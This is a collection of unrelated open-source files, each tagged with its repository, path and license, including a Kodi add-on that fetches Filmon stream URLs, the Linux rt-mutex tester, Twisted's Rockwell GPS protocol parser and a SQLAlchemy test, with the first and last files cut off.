self.session.destroy()
return self.redirect_back()
if action == "del":
del self.session['test']
del self.session['beta']
return self.redirect_back()
if action == "add":
self.session['test'] = "test string"
self.session['beta'] = "beta string"
return self.redirect_back()
if action == "regen":
self.session.regen()
return self.redirect_back()
sts = stash.increment()
content = self.render_admin('session', {
'stash': sts,
'session': self.session,
'cookie': os.environ.get('HTTP_COOKIE', ''),
})
return content
if action == "modified":
self.response.headers['Last-Modified'] = "zAmsdwsdsd"
return self.render_admin('modified', {
'req': self.request.headers,
'res': self.response.headers,
})
if action == "etag":
etag_set = self.request.get('etag', False)
if etag_set:
self.response.headers['ETag'] = etag_set
# return self.redirect('/_etag')
return self.render_admin('etag', {
'req': self.request.headers,
'res': self.response.headers,
})
if action == "globals":
glob = sketch._sketch_globals
return self.render_admin('globals', {
'globals': glob,
})
if action == "env":
return self.render_sketch('env', {
'debug': self.debug,
'is_dev': self.is_dev,
'env': self.env,
'enviro': self.enviro,
})
|
bsd-2-clause
|
guymakam/Kodi-Israel
|
plugin.video.israelive/resources/lib/myFilmon.py
|
1
|
11283
|
import re, random, time
import urllib, urllib2, json
import common
AddonID = "plugin.video.israelive"
def GetUrlStream(url, filmonOldStrerams=False, useRtmp=False):
chNum, referrerCh, ChName, filmonMethod = GetUrlParams(url)
if filmonMethod is not None:
filmonOldStrerams = (filmonMethod == 0)
return GetChannelStream(chNum, referrerCh, ChName, filmonOldStrerams, useRtmp)
def GetChannelStream(chNum, referrerCh=None, ChName=None, filmonOldStrerams=False, useRtmp=False):
if referrerCh == None:
prms = GetChannelJson(chNum, filmonOldStrerams)
else:
prms = GetChannelJson(referrerCh, filmonOldStrerams)
if prms == None:
print '--------- Playing Error: there is no channel with id="{0}" ---------'.format(chNum)
return None,None,None,None
channelName, channelDescription, iconimage, streamUrl, tvGuide = GetChannelDetails(prms, chNum, referrerCh, ChName, filmonOldStrerams, useRtmp)
#print '--------- Playing: ch="{0}", name="{1}" ----------'.format(chNum, channelName)
#return streamUrl, channelName, programmeName, iconimage #, image
return streamUrl, channelName, iconimage, tvGuide
def GetChannelGuide(chNum, filmonOldStrerams=False):
prms = GetChannelJson(chNum, filmonOldStrerams)
if prms == None:
return None,None,None,None
channelName, channelDescription, iconimage, streamUrl, tvGuide = GetChannelDetails(prms, chNum, filmonOldStrerams=filmonOldStrerams)
return channelName, channelDescription, iconimage, tvGuide
def MakeChannelGuide(prms):
tvGuide = []
server_time = int(prms["server_time"]) if prms.has_key("server_time") else int(time.time())
programmename = ""
description = ""
startdatetime = 0
enddatetime = 0
if prms.has_key("tvguide") and len(prms["tvguide"]) > 1:
tvguide = prms["tvguide"]
for prm in tvguide:
startdatetime = int(prm["startdatetime"])
enddatetime = int(prm["enddatetime"])
if server_time > enddatetime:
continue
description = prm["programme_description"]
programmename = prm["programme_name"]
image = None if not prm.has_key("images") or len(prm["images"]) == 0 or not prm["images"][0].has_key("url") else prm["images"][0]["url"]
tvGuide.append({"start": startdatetime, "end": enddatetime, "name": programmename.encode('utf-8'), "description": description.encode('utf-8'), "image": image})
elif prms.has_key("now_playing") and len(prms["now_playing"]) > 0:
now_playing = prms["now_playing"]
startdatetime = int(now_playing["startdatetime"])
enddatetime = int(now_playing["enddatetime"])
if startdatetime < server_time and server_time < enddatetime:
description = now_playing["programme_description"]
programmename = now_playing["programme_name"]
image = None if not now_playing.has_key("images") or len(now_playing["images"]) == 0 or not now_playing["images"][0].has_key("url") else now_playing["images"][0]["url"]
tvGuide.append({"start": startdatetime, "end": enddatetime, "name": programmename.encode('utf-8'), "description": description.encode('utf-8'), "image": image})
if prms.has_key("next_playing") and len(prms["next_playing"]) > 0:
next_playing = prms["next_playing"]
startdatetime = int(next_playing["startdatetime"])
enddatetime = int(next_playing["enddatetime"])
description = next_playing["programme_description"]
programmename = next_playing["programme_name"]
image = None if not next_playing.has_key("images") or len(next_playing["images"]) == 0 or not next_playing["images"][0].has_key("url") else next_playing["images"][0]["url"]
tvGuide.append({"start": startdatetime, "end": enddatetime, "name": programmename.encode('utf-8'), "description": description.encode('utf-8'), "image": image})
return tvGuide
def GetChannelDetails(prms, chNum, referrerCh=None, ChName=None, filmonOldStrerams=False, useRtmp=False):
channelName = ""
channelDescription = ""
iconimage = 'http://static.filmon.com/couch/channels/{0}/extra_big_logo.png'.format(chNum)
url = None
tvGuide = []
if filmonOldStrerams:
url = GetFilmonOldStreram(prms['streams'], useHls=not useRtmp)
else:
url = prms["serverURL"]
if useRtmp:
url = hls2rtmp(url)
streamUrl = None if url is None else url.replace('low','high')
if referrerCh == None:
tvGuide = MakeChannelGuide(prms)
channelName = prms["title"].encode("utf-8")
else:
streamUrl = streamUrl.replace("{0}.".format(referrerCh), "{0}.".format(chNum))
channelName = ChName
return channelName, channelDescription, iconimage, streamUrl, tvGuide
def OpenURL(url, headers={}, user_data={}, justCookie=False):
if user_data:
user_data = urllib.urlencode(user_data)
req = urllib2.Request(url, user_data)
else:
req = urllib2.Request(url)
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0')
for k, v in headers.items():
req.add_header(k, v)
try:
response = urllib2.urlopen(req)
except:
return None
if justCookie == True:
if response.info().has_key("Set-Cookie"):
data = response.info()['Set-Cookie']
else:
data = None
else:
data = response.read()
response.close()
return data
def getCookie():
return OpenURL('http://www.filmon.com/tv/htmlmain', justCookie=True)
def getChannelHtml(cookie, chNum):
headers = {'X-Requested-With': 'XMLHttpRequest', 'Connection': 'Keep-Alive', 'Cookie': cookie}
user_data = {'channel_id': chNum}
return OpenURL('http://www.filmon.com/ajax/getChannelInfo', headers, user_data)
def GetChannelParams(html):
resultJSON = None
try:
resultJSON = json.loads(html)
if len(resultJSON) < 1 or not resultJSON.has_key("title"):
return None
except:
pass
return resultJSON
def GetChannelJson(chNum, filmonOldStrerams=False):
if filmonOldStrerams:
html = OpenURL("http://www.filmon.com/api/init/")
if html is None:
return None
resultJSON = json.loads(html)
session_key = resultJSON["session_key"]
html = OpenURL("http://www.filmon.com/api/channel/{0}?session_key={1}".format(chNum , session_key))
else:
cookie = getCookie()
if cookie == None:
return None
html = getChannelHtml(cookie, chNum)
return GetChannelParams(html)
def get_params(url):
param = []
params = url
if len(params) >= 2:
i = params.find('?')
if i == -1:
return param
params = params[i:]
cleanedparams = params.replace('?','')
if (params[len(params)-1] == '/'):
params = params[0:len(params)-2]
pairsofparams = cleanedparams.split('&')
param = {}
for i in range(len(pairsofparams)):
splitparams = {}
splitparams = pairsofparams[i].split('=')
if (len(splitparams)) == 2:
param[splitparams[0].lower()] = splitparams[1]
return param
def GetUrlParams(url):
params=get_params(url)
chNum = None
referrerCh = None
ChName = None
filmonMethod = None
try:
chNum = int(params["url"])
except:
pass
try:
referrerCh = int(params["referrerch"])
except:
pass
try:
ChName = str(params["chname"])
except:
pass
try:
filmonMethod = int(params["filmonmethod"])
except:
pass
return chNum, referrerCh, ChName, filmonMethod
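# Illustrative plugin URL shape parsed above (added comment; values are
# hypothetical): ".../?url=22&referrerch=24&chname=Ch22&filmonmethod=1" yields
# chNum=22, referrerCh=24, ChName="Ch22", filmonMethod=1.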
def GetFilmonOldStreram(streams, useHls=False):
selectedStream = None
for stream in streams:
if stream ['quality'].lower() == "low":
selectedStream = stream
break
if selectedStream is not None:
streamUrl = selectedStream['url'] + '<'
streamName = selectedStream['name'].replace("low", "high")
if useHls:
regx = re.compile('rtmp://(.+?)\?id=(.+?)<')
match = regx.search(streamUrl)
return "http://{0}{1}/playlist.m3u8?id={2}".format(match.group(1), streamName, match.group(2))
if re.search('mp4', streamName, re.IGNORECASE):
regx = re.compile('rtmp://(.+?)/(.+?)/(.+?)/<')
match = regx.search(streamUrl)
app = '{0}/{1}/'.format(match.group(2), match.group(3))
swfUrl = 'http://www.filmon.com/tv/modules/FilmOnTV/files/flashapp/filmon/FilmonPlayer.swf'
url = "{0}{1}".format(selectedStream['url'], streamName)
if re.search('m4v', streamName, re.IGNORECASE):
app = 'vodlast'
swfUrl = 'http://www.filmon.com/tv/modules/FilmOnTV/files/flashapp/filmon/FilmonPlayer.swf'
url = "{0}/{1}".format(selectedStream['url'], streamName)
else:
try:
regx = re.compile('rtmp://(.+?)/live/(.+?)id=(.+?)<')
match = regx.search(streamUrl)
app = 'live/{0}id={1}'.format(match.group(2), match.group(3))
url = selectedStream['url']
swfUrl = 'http://www.filmon.com/tv/modules/FilmOnTV/files/flashapp/filmon/FilmonPlayer.swf'
except:
pass
try:
regx = re.compile('rtmp://(.+?)/(.+?)id=(.+?)"')
match = regx.search(streamUrl)
app = '{0}id={1}'.format(match.group(2), match.group(3))
swfUrl = 'http://www.filmon.com/tv/modules/FilmOnTV/files/flashapp/filmon/FilmonPlayer.swf?v=28'
except:
pass
try:
regx = re.compile('rtmp://(.+?)/(.+?)/<')
match = regx.search(streamUrl)
app = '{0}/'.format(match.group(2))
url = "{0}/{1}".format(selectedStream['url'], streamName)
swfUrl = 'http://www.filmon.com/tv/modules/FilmOnTV/files/flashapp/filmon/FilmonPlayer.swf'
except:
pass
tcUrl = selectedStream['url']
url = "{0} playpath={1} app={2} swfUrl={3} tcUrl={4} pageurl=http://www.filmon.com/ live=true timeout=45 swfVfy=true".format(url, streamName, app, swfUrl, tcUrl)
return url
def hls2rtmp(urlhls):
url2 = urlhls.split('/')
urlrtmp = "rtmp://%s/live/%s" % (url2[2],url2[5].replace('playlist.m3u8',''))
playpath = url2[4].replace('.l.stream', '.low.stream').replace('.lo.stream', '.low.stream')
swfUrl = 'http://www.filmon.com/tv/modules/FilmOnTV/files/flashapp/filmon/FilmonPlayer.swf'
urlrtmp = "{0}/{1} playpath={1} swfUrl={2} pageUrl=http://www.filmon.com/ live=true timeout=45 swfVfy=true".format(urlrtmp, playpath, swfUrl)
return urlrtmp
def GetFilmonChannelsList():
list = []
try:
list1 = common.GetListFromPlx(includeCatNames=False, fullScan=True)
for item in list1:
if item["type"] == 'video':
url = item['url']
if url.find(AddonID) > 0:
channel = re.compile('url=([0-9]*).*?mode=1(.*?)$',re.I+re.M+re.U+re.S).findall(url)
if len(channel) > 0 and channel[0][0] != "" and channel[0][1].find("&ignorefilmonguide=1") < 0:
list.append({"channel": int(channel[0][0]), "name": item["name"]})
except:
pass
return list
def MakePLXguide(filmonGuideFile):
filmonlist = GetFilmonChannelsList()
if filmonlist == []:
return False
randList = [{ "index": filmonlist.index(item), "channel": item["channel"]} for item in filmonlist]
random.seed()
random.shuffle(randList)
#cookie = OpenURL('http://www.filmon.com/tv/htmlmain', justCookie=True)
#if cookie == None:
# return
html = OpenURL("http://www.filmon.com/api/init/")
if html is None:
return False
resultJSON = json.loads(html)
session_key = resultJSON["session_key"]
for item in randList:
prms = None
#html = getChannelHtml(cookie, item["channel"])
html = OpenURL("http://www.filmon.com/api/channel/{0}?session_key={1}".format(item["channel"] , session_key))
if html is not None:
prms = GetChannelParams(html)
tvGuide = [] if prms is None else MakeChannelGuide(prms)
filmonlist[item["index"]] = {"channel": filmonlist[item["index"]]["name"], "tvGuide": tvGuide}
with open(filmonGuideFile, 'w') as outfile:
json.dump(filmonlist, outfile)
outfile.close()
return True
|
gpl-2.0
|
sadleader/odoo
|
addons/resource/faces/observer.py
|
433
|
2328
|
#@+leo-ver=4
#@+node:@file observer.py
#@@language python
#@<< Copyright >>
#@+node:<< Copyright >>
############################################################################
# Copyright (C) 2005, 2006, 2007, 2008 by Reithinger GmbH
# [email protected]
#
# This file is part of faces.
#
# faces is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# faces is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
############################################################################
#@-node:<< Copyright >>
#@nl
"""
This module contains the base class for all observer objects
"""
#@<< Imports >>
#@+node:<< Imports >>
#@-node:<< Imports >>
#@nl
_is_source_ = True
#@+others
#@+node:class Observer
class Observer(object):
"""
Base Class for all charts and reports.
@var visible: Specifies if the observer is visible
at the navigation bar inside the gui.
    @var link_view: synchronizes the marked objects in all views.
"""
#@ << declarations >>
#@+node:<< declarations >>
__type_name__ = None
__type_image__ = None
visible = True
link_view = True
__attrib_completions__ = { "visible" : 'visible = False',
"link_view" : "link_view = False" }
#@-node:<< declarations >>
#@nl
#@ @+others
#@+node:register_editors
def register_editors(cls, registry):
pass
register_editors = classmethod(register_editors)
#@-node:register_editors
#@-others
#@-node:class Observer
#@-others
factories = { }
clear_cache_funcs = {}
#@-node:@file observer.py
#@-leo
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
wisechengyi/pants
|
src/python/pants/engine/legacy_engine.py
|
1
|
1345
|
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from abc import ABC, abstractmethod
from pants.base.exceptions import TaskError
class Engine(ABC):
"""An engine for running a pants command line."""
def execute(self, context, goals):
"""Executes the supplied goals and their dependencies against the given context.
:param context: The pants run context.
:param list goals: A list of ``Goal`` objects representing the command line goals explicitly
requested.
:returns int: An exit code of 0 upon success and non-zero otherwise.
"""
try:
self.attempt(context, goals)
return 0
except TaskError as e:
message = str(e)
if message:
print("\nFAILURE: {0}\n".format(message))
else:
print("\nFAILURE\n")
return e.exit_code
@abstractmethod
def attempt(self, context, goals):
"""Given the target context and command line goals, attempt to achieve all goals.
:param context: The pants run context.
:param list goals: A list of ``Goal`` objects representing the command line goals explicitly
requested.
"""
|
apache-2.0
|
erik96/Linux-Kernel-3.4
|
scripts/rt-tester/rt-tester.py
|
11005
|
5307
|
#!/usr/bin/python
#
# rt-mutex tester
#
# (C) 2006 Thomas Gleixner <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
import os
import sys
import getopt
import shutil
import string
# Globals
quiet = 0
test = 0
comments = 0
sysfsprefix = "/sys/devices/system/rttest/rttest"
statusfile = "/status"
commandfile = "/command"
# Command opcodes
cmd_opcodes = {
"schedother" : "1",
"schedfifo" : "2",
"lock" : "3",
"locknowait" : "4",
"lockint" : "5",
"lockintnowait" : "6",
"lockcont" : "7",
"unlock" : "8",
"signal" : "11",
"resetevent" : "98",
"reset" : "99",
}
test_opcodes = {
"prioeq" : ["P" , "eq" , None],
"priolt" : ["P" , "lt" , None],
"priogt" : ["P" , "gt" , None],
"nprioeq" : ["N" , "eq" , None],
"npriolt" : ["N" , "lt" , None],
"npriogt" : ["N" , "gt" , None],
"unlocked" : ["M" , "eq" , 0],
"trylock" : ["M" , "eq" , 1],
"blocked" : ["M" , "eq" , 2],
"blockedwake" : ["M" , "eq" , 3],
"locked" : ["M" , "eq" , 4],
"opcodeeq" : ["O" , "eq" , None],
"opcodelt" : ["O" , "lt" , None],
"opcodegt" : ["O" , "gt" , None],
"eventeq" : ["E" , "eq" , None],
"eventlt" : ["E" , "lt" , None],
"eventgt" : ["E" , "gt" , None],
}
# Print usage information
def usage():
print "rt-tester.py <-c -h -q -t> <testfile>"
print " -c display comments after first command"
print " -h help"
print " -q quiet mode"
print " -t test mode (syntax check)"
print " testfile: read test specification from testfile"
print " otherwise from stdin"
return
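# Illustrative note, not part of the original script: the parser below reads
# each non-comment line as four colon-separated fields,
#     <command>:<opcode>:<thread-id>:<data>
# so a hypothetical test specification could look like
#     C: schedfifo:  0: 80
#     C: locknowait: 0: 0
#     W: locked:     0: 0
#     C: unlock:     0: 0
# where "C" issues a command and "T"/"W" test or wait for a status value.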
# Print progress when not in quiet mode
def progress(str):
if not quiet:
print str
# Analyse a status value
def analyse(val, top, arg):
intval = int(val)
if top[0] == "M":
intval = intval / (10 ** int(arg))
intval = intval % 10
argval = top[2]
elif top[0] == "O":
argval = int(cmd_opcodes.get(arg, arg))
else:
argval = int(arg)
# progress("%d %s %d" %(intval, top[1], argval))
if top[1] == "eq" and intval == argval:
return 1
if top[1] == "lt" and intval < argval:
return 1
if top[1] == "gt" and intval > argval:
return 1
return 0
# Parse the commandline
try:
(options, arguments) = getopt.getopt(sys.argv[1:],'chqt')
except getopt.GetoptError, ex:
usage()
sys.exit(1)
# Parse commandline options
for option, value in options:
if option == "-c":
comments = 1
elif option == "-q":
quiet = 1
elif option == "-t":
test = 1
elif option == '-h':
usage()
sys.exit(0)
# Select the input source
if arguments:
try:
fd = open(arguments[0])
except Exception,ex:
sys.stderr.write("File not found %s\n" %(arguments[0]))
sys.exit(1)
else:
fd = sys.stdin
linenr = 0
# Read the test patterns
while 1:
linenr = linenr + 1
line = fd.readline()
if not len(line):
break
line = line.strip()
parts = line.split(":")
if not parts or len(parts) < 1:
continue
if len(parts[0]) == 0:
continue
if parts[0].startswith("#"):
if comments > 1:
progress(line)
continue
if comments == 1:
comments = 2
progress(line)
cmd = parts[0].strip().lower()
opc = parts[1].strip().lower()
tid = parts[2].strip()
dat = parts[3].strip()
try:
# Test or wait for a status value
if cmd == "t" or cmd == "w":
testop = test_opcodes[opc]
fname = "%s%s%s" %(sysfsprefix, tid, statusfile)
if test:
print fname
continue
while 1:
query = 1
fsta = open(fname, 'r')
status = fsta.readline().strip()
fsta.close()
stat = status.split(",")
for s in stat:
s = s.strip()
if s.startswith(testop[0]):
# Separate status value
val = s[2:].strip()
query = analyse(val, testop, dat)
break
if query or cmd == "t":
break
progress(" " + status)
if not query:
sys.stderr.write("Test failed in line %d\n" %(linenr))
sys.exit(1)
# Issue a command to the tester
elif cmd == "c":
cmdnr = cmd_opcodes[opc]
# Build command string and sys filename
cmdstr = "%s:%s" %(cmdnr, dat)
fname = "%s%s%s" %(sysfsprefix, tid, commandfile)
if test:
print fname
continue
fcmd = open(fname, 'w')
fcmd.write(cmdstr)
fcmd.close()
except Exception,ex:
sys.stderr.write(str(ex))
sys.stderr.write("\nSyntax error in line %d\n" %(linenr))
if not test:
fd.close()
sys.exit(1)
# Normal exit pass
print "Pass"
sys.exit(0)
|
gpl-2.0
|
dya2/python-for-android
|
python-modules/twisted/twisted/protocols/gps/rockwell.py
|
61
|
11638
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
"""Rockwell Semiconductor Zodiac Serial Protocol
Coded from official protocol specs (Order No. GPS-25, 09/24/1996, Revision 11)
Maintainer: Bob Ippolito
The following Rockwell Zodiac messages are currently understood::
EARTHA\\r\\n (a hack to "turn on" a DeLorme Earthmate)
1000 (Geodesic Position Status Output)
1002 (Channel Summary)
1003 (Visible Satellites)
1011 (Receiver ID)
The following Rockwell Zodiac messages require implementation::
None really, the others aren't quite so useful and require bidirectional communication w/ the device
Other desired features::
- Compatibility with the DeLorme Tripmate and other devices with this chipset (?)
"""
import struct, operator, math
from twisted.internet import protocol
from twisted.python import log
DEBUG = 1
class ZodiacParseError(ValueError):
pass
class Zodiac(protocol.Protocol):
dispatch = {
# Output Messages (* means they get sent by the receiver by default periodically)
1000: 'fix', # *Geodesic Position Status Output
1001: 'ecef', # ECEF Position Status Output
1002: 'channels', # *Channel Summary
1003: 'satellites', # *Visible Satellites
1005: 'dgps', # Differential GPS Status
1007: 'channelmeas', # Channel Measurement
1011: 'id', # *Receiver ID
1012: 'usersettings', # User-Settings Output
1100: 'testresults', # Built-In Test Results
1102: 'meastimemark', # Measurement Time Mark
1108: 'utctimemark', # UTC Time Mark Pulse Output
1130: 'serial', # Serial Port Communication Parameters In Use
1135: 'eepromupdate', # EEPROM Update
1136: 'eepromstatus', # EEPROM Status
}
# these aren't used for anything yet, just sitting here for reference
messages = {
# Input Messages
'fix': 1200, # Geodesic Position and Velocity Initialization
'udatum': 1210, # User-Defined Datum Definition
'mdatum': 1211, # Map Datum Select
'smask': 1212, # Satellite Elevation Mask Control
'sselect': 1213, # Satellite Candidate Select
'dgpsc': 1214, # Differential GPS Control
'startc': 1216, # Cold Start Control
'svalid': 1217, # Solution Validity Control
'antenna': 1218, # Antenna Type Select
'altinput': 1219, # User-Entered Altitude Input
'appctl': 1220, # Application Platform Control
'navcfg': 1221, # Nav Configuration
'test': 1300, # Perform Built-In Test Command
'restart': 1303, # Restart Command
'serial': 1330, # Serial Port Communications Parameters
'msgctl': 1331, # Message Protocol Control
'dgpsd': 1351, # Raw DGPS RTCM SC-104 Data
}
MAX_LENGTH = 296
allow_earthmate_hack = 1
recvd = ""
def dataReceived(self, recd):
self.recvd = self.recvd + recd
while len(self.recvd) >= 10:
# hack for DeLorme EarthMate
if self.recvd[:8] == 'EARTHA\r\n':
if self.allow_earthmate_hack:
self.allow_earthmate_hack = 0
self.transport.write('EARTHA\r\n')
self.recvd = self.recvd[8:]
continue
if self.recvd[0:2] != '\xFF\x81':
if DEBUG:
raise ZodiacParseError('Invalid Sync %r' % self.recvd)
else:
raise ZodiacParseError
sync, msg_id, length, acknak, checksum = struct.unpack('<HHHHh', self.recvd[:10])
# verify checksum
cksum = -(reduce(operator.add, (sync, msg_id, length, acknak)) & 0xFFFF)
cksum, = struct.unpack('<h', struct.pack('<h', cksum))
if cksum != checksum:
if DEBUG:
raise ZodiacParseError('Invalid Header Checksum %r != %r %r' % (checksum, cksum, self.recvd[:8]))
else:
raise ZodiacParseError
# length was in words, now it's bytes
length = length * 2
# do we need more data ?
neededBytes = 10
if length:
neededBytes += length + 2
if len(self.recvd) < neededBytes:
break
if neededBytes > self.MAX_LENGTH:
raise ZodiacParseError("Invalid Header??")
# empty messages pass empty strings
message = ''
# does this message have data ?
if length:
message, checksum = self.recvd[10:10+length], struct.unpack('<h', self.recvd[10+length:neededBytes])[0]
cksum = 0x10000 - (reduce(operator.add, struct.unpack('<%dH' % (length/2), message)) & 0xFFFF)
cksum, = struct.unpack('<h', struct.pack('<h', cksum))
if cksum != checksum:
if DEBUG:
log.msg('msg_id = %r length = %r' % (msg_id, length), debug=True)
raise ZodiacParseError('Invalid Data Checksum %r != %r %r' % (checksum, cksum, message))
else:
raise ZodiacParseError
# discard used buffer, dispatch message
self.recvd = self.recvd[neededBytes:]
self.receivedMessage(msg_id, message, acknak)
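# Illustrative summary, not part of the original module: as unpacked above, a
# Zodiac frame starts with a 10-byte little-endian header of five 16-bit words
#     sync (0x81FF), msg_id, length (in words), acknak, header checksum
# optionally followed by length * 2 data bytes and a 16-bit data checksum; each
# checksum is the two's-complement negation of the 16-bit sum of the words it
# covers.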
def receivedMessage(self, msg_id, message, acknak):
dispatch = self.dispatch.get(msg_id, None)
if not dispatch:
raise ZodiacParseError('Unknown msg_id = %r' % msg_id)
handler = getattr(self, 'handle_%s' % dispatch, None)
decoder = getattr(self, 'decode_%s' % dispatch, None)
if not (handler and decoder):
# missing handler or decoder
#if DEBUG:
# log.msg('MISSING HANDLER/DECODER PAIR FOR: %r' % (dispatch,), debug=True)
return
decoded = decoder(message)
return handler(*decoded)
def decode_fix(self, message):
assert len(message) == 98, "Geodesic Position Status Output should be 55 words total (98 byte message)"
(ticks, msgseq, satseq, navstatus, navtype, nmeasure, polar, gpswk, gpses, gpsns, utcdy, utcmo, utcyr, utchr, utcmn, utcsc, utcns, latitude, longitude, height, geoidalsep, speed, course, magvar, climb, mapdatum, exhposerr, exvposerr, extimeerr, exphvelerr, clkbias, clkbiasdev, clkdrift, clkdriftdev) = struct.unpack('<LhhHHHHHLLHHHHHHLlllhLHhhHLLLHllll', message)
# there's a lot of shit in here..
# I'll just snag the important stuff and spit it out like my NMEA decoder
utc = (utchr * 3600.0) + (utcmn * 60.0) + utcsc + (float(utcns) * 0.000000001)
log.msg('utchr, utcmn, utcsc, utcns = ' + repr((utchr, utcmn, utcsc, utcns)), debug=True)
latitude = float(latitude) * 0.00000180 / math.pi
longitude = float(longitude) * 0.00000180 / math.pi
posfix = not (navstatus & 0x001c)
satellites = nmeasure
hdop = float(exhposerr) * 0.01
altitude = float(height) * 0.01, 'M'
geoid = float(geoidalsep) * 0.01, 'M'
dgps = None
return (
# seconds since 00:00 UTC
utc,
# latitude (degrees)
latitude,
# longitude (degrees)
longitude,
# position fix status (invalid = False, valid = True)
posfix,
# number of satellites [measurements] used for fix 0 <= satellites <= 12
satellites,
# horizontal dilution of precision
hdop,
# (altitude according to WGS-84 ellipsoid, units (always 'M' for meters))
altitude,
# (geoid separation according to WGS-84 ellipsoid, units (always 'M' for meters))
geoid,
# None, for compatibility w/ NMEA code
dgps,
)
def decode_id(self, message):
assert len(message) == 106, "Receiver ID Message should be 59 words total (106 byte message)"
ticks, msgseq, channels, software_version, software_date, options_list, reserved = struct.unpack('<Lh20s20s20s20s20s', message)
channels, software_version, software_date, options_list = map(lambda s: s.split('\0')[0], (channels, software_version, software_date, options_list))
software_version = float(software_version)
channels = int(channels) # 0-12 .. but ALWAYS 12, so we ignore.
options_list = int(options_list[:4], 16) # only two bitflags, others are reserved
minimize_rom = (options_list & 0x01) > 0
minimize_ram = (options_list & 0x02) > 0
# (version info), (options info)
return ((software_version, software_date), (minimize_rom, minimize_ram))
def decode_channels(self, message):
assert len(message) == 90, "Channel Summary Message should be 51 words total (90 byte message)"
ticks, msgseq, satseq, gpswk, gpsws, gpsns = struct.unpack('<LhhHLL', message[:18])
channels = []
message = message[18:]
for i in range(12):
flags, prn, cno = struct.unpack('<HHH', message[6 * i:6 * (i + 1)])
# measurement used, ephemeris available, measurement valid, dgps corrections available
flags = (flags & 0x01, flags & 0x02, flags & 0x04, flags & 0x08)
channels.append((flags, prn, cno))
# ((flags, satellite PRN, C/No in dbHz)) for 12 channels
# satellite message sequence number
# gps week number, gps seconds in week (??), gps nanoseconds from Epoch
return (tuple(channels),) #, satseq, (gpswk, gpsws, gpsns))
def decode_satellites(self, message):
assert len(message) == 90, "Visible Satellites Message should be 51 words total (90 byte message)"
ticks, msgseq, gdop, pdop, hdop, vdop, tdop, numsatellites = struct.unpack('<LhhhhhhH', message[:18])
gdop, pdop, hdop, vdop, tdop = map(lambda n: float(n) * 0.01, (gdop, pdop, hdop, vdop, tdop))
satellites = []
message = message[18:]
for i in range(numsatellites):
prn, azi, elev = struct.unpack('<Hhh', message[6 * i:6 * (i + 1)])
azi, elev = map(lambda n: (float(n) * 0.0180 / math.pi), (azi, elev))
satellites.append((prn, azi, elev))
# ((PRN [0, 32], azimuth +=[0.0, 180.0] deg, elevation +-[0.0, 90.0] deg)) satellite info (0-12)
# (geometric, position, horizontal, vertical, time) dilution of precision
return (tuple(satellites), (gdop, pdop, hdop, vdop, tdop))
def decode_dgps(self, message):
assert len(message) == 38, "Differential GPS Status Message should be 25 words total (38 byte message)"
raise NotImplementedError
def decode_ecef(self, message):
assert len(message) == 96, "ECEF Position Status Output Message should be 54 words total (96 byte message)"
raise NotImplementedError
def decode_channelmeas(self, message):
assert len(message) == 296, "Channel Measurement Message should be 154 words total (296 byte message)"
raise NotImplementedError
def decode_usersettings(self, message):
assert len(message) == 32, "User-Settings Output Message should be 22 words total (32 byte message)"
raise NotImplementedError
def decode_testresults(self, message):
assert len(message) == 28, "Built-In Test Results Message should be 20 words total (28 byte message)"
raise NotImplementedError
def decode_meastimemark(self, message):
assert len(message) == 494, "Measurement Time Mark Message should be 253 words total (494 byte message)"
raise NotImplementedError
def decode_utctimemark(self, message):
assert len(message) == 28, "UTC Time Mark Pulse Output Message should be 20 words total (28 byte message)"
raise NotImplementedError
def decode_serial(self, message):
assert len(message) == 30, "Serial Port Communication Parameters In Use Message should be 21 words total (30 byte message)"
raise NotImplementedError
def decode_eepromupdate(self, message):
assert len(message) == 8, "EEPROM Update Message should be 10 words total (8 byte message)"
raise NotImplementedError
def decode_eepromstatus(self, message):
assert len(message) == 24, "EEPROM Status Message should be 18 words total (24 byte message)"
raise NotImplementedError
|
apache-2.0
|
hernandito/SickRage
|
lib/sqlalchemy/testing/suite/test_update_delete.py
|
76
|
1578
|
from .. import fixtures, config
from ..assertions import eq_
from sqlalchemy import Integer, String
from ..schema import Table, Column
class SimpleUpdateDeleteTest(fixtures.TablesTest):
run_deletes = 'each'
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table('plain_pk', metadata,
Column('id', Integer, primary_key=True),
Column('data', String(50))
)
@classmethod
def insert_data(cls):
config.db.execute(
cls.tables.plain_pk.insert(),
[
{"id":1, "data":"d1"},
{"id":2, "data":"d2"},
{"id":3, "data":"d3"},
]
)
def test_update(self):
t = self.tables.plain_pk
r = config.db.execute(
t.update().where(t.c.id == 2),
data="d2_new"
)
assert not r.is_insert
assert not r.returns_rows
eq_(
config.db.execute(t.select().order_by(t.c.id)).fetchall(),
[
(1, "d1"),
(2, "d2_new"),
(3, "d3")
]
)
def test_delete(self):
t = self.tables.plain_pk
r = config.db.execute(
t.delete().where(t.c.id == 2)
)
assert not r.is_insert
assert not r.returns_rows
eq_(
config.db.execute(t.select().order_by(t.c.id)).fetchall(),
[
(1, "d1"),
(3, "d3")
]
)
__all__ = ('SimpleUpdateDeleteTest', )
|
gpl-3.0
|
grantkinsler/motifproject
|
motifcompetesim_initialconditions/motifcompetesimtracker_trial.py
|
1
|
1653
|
from motifcompetesimtracker_cell import Cell
from motifcompetesimtracker_population import Population
import random as rand
from copy import deepcopy
from copy import copy
def motifcompetesim_trial(celllist,elonglist,motiflist,max_strand_nr,maxStrandLength,numCells,numRounds,elong,biaslist):
population = Population([],motiflist,'empty','empty','empty')
population.populate(numCells,motiflist,max_strand_nr)
population.initial_condition_populate(celllist,elonglist,motiflist,max_strand_nr)
# counter lists
nr_motifs = []
nr_cells_with_motif = []
for iterator in xrange(len(motiflist)):
